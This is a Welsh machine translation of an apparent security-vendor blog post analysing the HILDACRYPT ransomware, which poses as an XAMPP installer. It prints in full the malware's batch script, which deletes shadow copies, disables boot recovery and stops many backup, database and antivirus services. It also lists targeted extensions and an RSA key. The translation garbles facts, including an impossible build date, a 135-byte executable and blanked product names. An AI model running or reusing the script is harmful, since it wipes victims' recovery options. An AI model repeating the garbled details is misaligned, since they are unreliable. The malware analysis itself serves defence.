Helo, Habr! Unwaith eto, rydym yn sôn am y fersiynau diweddaraf o malware o'r categori Ransomware. Mae HILDACRYPT yn ransomware newydd, aelod o deulu Hilda a ddarganfuwyd ym mis Awst 2019, a enwyd ar ôl y cartŵn Netflix a ddefnyddiwyd i ddosbarthu'r feddalwedd. Heddiw rydyn ni'n dod yn gyfarwydd â nodweddion technegol y firws ransomware hwn sydd wedi'i ddiweddaru.
Yn y fersiwn gyntaf o Hilda ransomware, dolen i un wedi'i bostio ar Youtube roedd cyfresi cartŵn wedi'u cynnwys yn y llythyr pridwerth. Mae HILDACRYPT yn cuddio fel gosodwr XAMPP cyfreithlon, dosbarthiad Apache hawdd ei osod sy'n cynnwys MariaDB, PHP, a Perl. Ar yr un pryd, mae gan y cryptolocker enw ffeil gwahanol - xamp. Yn ogystal, nid oes gan y ffeil ransomware lofnod electronig.
Dadansoddiad statig
Mae'r ransomware wedi'i gynnwys mewn ffeil PE32 .NET a ysgrifennwyd ar gyfer MS Windows. Ei maint yw 135 bytes. Mae prif god y rhaglen a chod rhaglen yr amddiffynwr wedi'u hysgrifennu yn C#. Yn ôl y dyddiad llunio a'r stamp amser, crëwyd y deuaidd ar Fedi 168, 14.
Yn ôl Detect It Easy, mae'r ransomware yn cael ei archifo gan ddefnyddio Confuser a ConfuserEx, ond mae'r obfuscators hyn yr un fath ag o'r blaen, dim ond ConfuserEx yw olynydd Confuser, felly mae eu llofnodion cod yn debyg.
Mae HILDACRYPT yn wir wedi'i becynnu gyda ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Fector ymosodiad
Yn fwyaf tebygol, darganfuwyd y ransomware ar un o'r gwefannau rhaglennu, gan guddio fel rhaglen XAMPP gyfreithlon.
Gellir gweld y gadwyn gyfan o haint yn .
Obfuscation
Mae'r llinynnau ransomware yn cael eu storio ar ffurf wedi'i hamgryptio. Pan gaiff ei lansio, mae HILDACRYPT yn eu dadgryptio gan ddefnyddio Base64 ac AES-256-CBC.
Gosod
Yn gyntaf oll, mae'r ransomware yn creu ffolder yn % AppDataRoaming% lle mae'r paramedr GUID (Dynnodwr Unigryw Byd-eang) yn cael ei gynhyrchu ar hap. Trwy ychwanegu ffeil ystlumod i'r lleoliad hwn, mae'r firws ransomware yn ei lansio gan ddefnyddio cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & ymadael
Yna mae'n dechrau gweithredu sgript swp i analluogi nodweddion system neu wasanaethau.
Mae'r sgript yn cynnwys rhestr hir o orchmynion sy'n dinistrio copïau cysgodol, yn analluogi'r gweinydd SQL, wrth gefn ac atebion gwrthfeirws.
Er enghraifft, mae'n ceisio atal gwasanaethau Acronis Backup yn aflwyddiannus. Yn ogystal, mae'n ymosod ar systemau wrth gefn ac atebion gwrthfeirws gan y gwerthwyr canlynol: Veeam, Sophos, Kaspersky, McAfee ac eraill.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Unwaith y bydd y gwasanaethau a'r prosesau a grybwyllir uchod yn anabl, mae'r cryptolocker yn casglu gwybodaeth am yr holl brosesau rhedeg gan ddefnyddio'r gorchymyn rhestr tasgau i sicrhau bod yr holl wasanaethau angenrheidiol i lawr.
rhestr tasgau v/fo csv
Mae'r gorchymyn hwn yn dangos rhestr fanwl o brosesau rhedeg, y mae'r arwydd “,” yn gwahanu'r elfennau ohonynt.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Ar ôl y gwiriad hwn, mae'r ransomware yn cychwyn y broses amgryptio.
Amgryptio
Amgryptio ffeil
Mae HILDACRYPT yn mynd trwy'r holl gynnwys a ddarganfuwyd ar yriannau caled, ac eithrio'r ffolderi Recycle.Bin a Reference AssembliesMicrosoft. Mae'r olaf yn cynnwys ffeiliau dll hanfodol, pdb, ac ati ar gyfer cymwysiadau .Net a all effeithio ar weithrediad y ransomware. I chwilio am ffeiliau a fydd yn cael eu hamgryptio, defnyddir y rhestr ganlynol o estyniadau:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Mae'r ransomware yn defnyddio'r algorithm AES-256-CBC i amgryptio ffeiliau defnyddwyr. Y maint allweddol yw 256 did a maint y fector ymgychwyn (IV) yw 16 beit.
Yn y screenshot canlynol, cafwyd gwerthoedd byte_2 a byte_1 ar hap gan ddefnyddio GetBytes ().
Allwedd
YN A
Mae gan y ffeil amgryptio'r estyniad HCY!... Dyma enghraifft o ffeil wedi'i hamgryptio. Crëwyd yr allwedd a'r IV a grybwyllwyd uchod ar gyfer y ffeil hon.
Amgryptio allwedd
Mae'r cryptolocker yn storio'r allwedd AES a gynhyrchir mewn ffeil wedi'i hamgryptio. Mae gan ran gyntaf y ffeil wedi'i hamgryptio bennawd sy'n cynnwys data fel HILDACRYPT, KEY, IV, FileLen mewn fformat XML, ac mae'n edrych fel hyn:
Gwneir amgryptio allwedd AES a IV gan ddefnyddio RSA-2048, a gwneir amgodio gan ddefnyddio Base64. Mae allwedd gyhoeddus RSA yn cael ei storio yng nghorff y cryptolocker yn un o'r llinynnau wedi'u hamgryptio mewn fformat XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Defnyddir allwedd gyhoeddus RSA i amgryptio allwedd ffeil AES. Mae allwedd gyhoeddus RSA wedi'i hamgodio Base64 ac mae'n cynnwys modwlws ac esboniwr cyhoeddus o 65537. Er mwyn dadgryptio mae angen allwedd breifat RSA, sydd gan yr ymosodwr.
Ar ôl amgryptio RSA, mae'r allwedd AES yn cael ei amgodio gan ddefnyddio Base64 wedi'i storio yn y ffeil wedi'i hamgryptio.
Neges pridwerth
Unwaith y bydd yr amgryptio wedi'i gwblhau, mae HILDACRYPT yn ysgrifennu'r ffeil html i'r ffolder y gwnaeth amgryptio'r ffeiliau ynddo. Mae'r hysbysiad ransomware yn cynnwys dau gyfeiriad e-bost lle gall y dioddefwr gysylltu â'r ymosodwr.
Mae'r hysbysiad cribddeiliaeth hefyd yn cynnwys y llinell “Nid oes loli yn ddiogel;)” - cyfeiriad at gymeriadau anime a manga gydag ymddangosiad merched bach wedi'u gwahardd yn Japan.
Allbwn
Mae HILDACRYPT, teulu ransomware newydd, wedi rhyddhau fersiwn newydd. Mae'r model amgryptio yn atal y dioddefwr rhag dadgryptio ffeiliau sydd wedi'u hamgryptio gan y ransomware. Mae Cryptolocker yn defnyddio dulliau amddiffyn gweithredol i analluogi gwasanaethau amddiffyn sy'n gysylltiedig â systemau wrth gefn ac atebion gwrthfeirws. Mae awdur HILDACRYPT yn gefnogwr o'r gyfres animeiddiedig Hilda a ddangosir ar Netflix, yr oedd y ddolen i'r trelar ohoni wedi'i chynnwys yn y llythyr prynu ar gyfer fersiwn flaenorol y rhaglen.
Fel rheol, и yn gallu amddiffyn eich cyfrifiadur rhag HILDACRYPT ransomware, ac mae gan ddarparwyr y gallu i amddiffyn eu cwsmeriaid gyda . Sicrheir amddiffyniad gan y ffaith bod yr atebion hyn yn cynnwys yn cynnwys nid yn unig wrth gefn, ond hefyd ein system ddiogelwch integredig - Wedi'i phweru gan fodel dysgu peirianyddol ac yn seiliedig ar hewristeg ymddygiadol, technoleg sy'n gallu gwrthsefyll bygythiad nwyddau pridwerth dim diwrnod fel dim arall.
Dangosyddion cyfaddawd
Estyniad ffeil HCY!
HILDACRYPTReadMe.html
xamp.exe gydag un llythyren "p" a dim llofnod digidol
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Ffynhonnell: hab.com